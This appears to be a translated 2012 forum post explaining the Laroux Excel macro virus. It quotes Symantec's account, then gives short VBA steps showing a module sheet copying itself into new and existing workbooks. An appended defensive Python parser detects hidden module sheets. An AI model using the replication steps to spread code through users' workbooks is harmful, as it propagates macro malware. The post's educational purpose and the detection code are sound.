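This post was last edited by kangatang on 2012-9-18 09:09
-----------------------------------------------The Laroux Family--------------------------------------
As is well known, whenever Laroux is mentioned, the infection technique is usually described like this:
".......a hidden sheet carrying the virus code is copied into an uninfected Excel file......completing the infection......"
Symantec describes Laroux as follows: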
“
In infected spreadsheet files (Excel workbooks), the "laroux" datasheet is not readily visible (it is hidden). When an infected spreadsheet is
first opened on a system, the Auto_Open macro is automatically run by Excel, which in turn runs the Check_Files macro. This happens each
time a worksheet is activated.
The Check_Files macro then copies the worksheet with the virus code into a spreadsheet file stored in the Excel startup directory named
Personal.xls. (By default, this directory is \MSOffice\Excel\XLStart.) Personal.xls is the "global macro spreadsheet;" macros stored there are
automatically available to all other Excel spreadsheets on the system. Copying these macros to Personal.xls enables the infection of all other
spreadsheets opened or created on the infected system in the future.
XM.Laroux contains no deliberately destructive payloads: it exists only to replicate. XM.Laroux only works on Microsoft Windows operating
systems using Excel versions 5 and 7. It does not work in the Macintosh environment.
XM.Laroux is written in English.
”
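Now let's build such a magical sheet.
STEP 1 (Create)
If you run
Sub test1()
    ' Add a new module sheet to this workbook
    ThisWorkbook.Modules.Add
End Sub
a new module is created.
====================================
STEP 2 (Self-replication)
Then add the following procedure to this new module:
Sub test2()
    ' Copy the module sheets; Excel places the copy in a new workbook
    ThisWorkbook.Modules.Copy
End Sub
A new book1.xls is created automatically.
This is where the most magical part appears: it copies itself.
This book1.xls actually contains the new module from STEP 2.
=====================================
STEP 3 (Infection)
Create a new workbook and name it mytest.xls.
In the workbook from STEP 1, run
Sub test3()
    ' Copy the first sheet of this workbook in front of the first sheet of mytest.xls
    ThisWorkbook.Sheets(1).Copy before:=Workbooks("mytest.xls").Sheets(1)
End Sub
Then look at mytest.xls again: it now contains an extra module, exactly the same as the one from STEP 1.
=====================================
Having read this far, you may feel the principle is that simple. But very few people know this (don't assume you already knew it).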
-----------------------------------------------Macro 4.0 Viruses-------------------------------------------------
Coming soon....
-----------------------------------------------COPYMOD, K4 and Other Emerging Viruses------------------------------
Coming soon....
-----------------------------------------------A Survey of Other Macro Viruses in History------------------------------------
Coming soon....
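A defender's view of the Laroux section above, as an added example that is not part of the original post: because the module travels as a hidden sheet, it shows up in the workbook's BOUNDSHEET records, which store each sheet's name, type and visibility. The sketch assumes the workbook stream has already been extracted from the .xls container with an OLE reader; the function names and the sample bytes are constructed for illustration.

```python
import struct

BOF, BOUNDSHEET = 0x0809, 0x0085
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}

def list_sheets(stream: bytes):
    """Walk the BIFF records of a workbook stream and return
    (name, type, visibility) for every BOUNDSHEET record."""
    pos, biff8, sheets = 0, False, []
    while pos + 4 <= len(stream):
        rec_id, rec_len = struct.unpack_from("<HH", stream, pos)
        body = stream[pos + 4 : pos + 4 + rec_len]
        if len(body) < rec_len:
            break  # truncated record: stop rather than misparse
        pos += 4 + rec_len
        if rec_id == BOF and rec_len >= 2:
            biff8 = struct.unpack_from("<H", body)[0] >= 0x0600
        elif rec_id == BOUNDSHEET and rec_len >= 8:
            state, kind, n = body[4] & 0x03, body[5], body[6]
            if biff8:  # BIFF8: flags byte, then 8-bit or UTF-16LE characters
                wide = body[7] & 0x01
                raw = body[8 : 8 + n * (2 if wide else 1)]
                name = raw.decode("utf-16-le" if wide else "latin-1")
            else:      # BIFF5/7 (Excel 5 and 7): plain byte string
                name = body[7 : 7 + n].decode("latin-1")
            sheets.append((name, SHEET_TYPES.get(kind, hex(kind)),
                           VISIBILITY.get(state, "unknown")))
    return sheets

def suspicious(sheets):
    """Hidden sheets that can carry code, or any sheet named 'laroux'."""
    return [s for s in sheets
            if s[0].lower() == "laroux"
            or (s[2] != "visible" and s[1] in ("VBA module", "macro sheet"))]

def rec(rec_id, body):
    return struct.pack("<HH", rec_id, len(body)) + body

def boundsheet5(name, kind, state):
    return rec(BOUNDSHEET, struct.pack("<IBBB", 0, state, kind, len(name)) + name)

# Constructed BIFF5 stream: one visible worksheet and one hidden module sheet.
SAMPLE = (rec(BOF, struct.pack("<HHHH", 0x0500, 0x0005, 0, 0))
          + boundsheet5(b"Sheet1", 0x00, 0) + boundsheet5(b"laroux", 0x06, 1)
          + rec(0x000A, b""))  # EOF record

if __name__ == "__main__":
    for hit in suspicious(list_sheets(SAMPLE)):
        print("review:", hit)
```

The same check applied to Personal.xls in the XLStart directory covers the persistence step in the Symantec description.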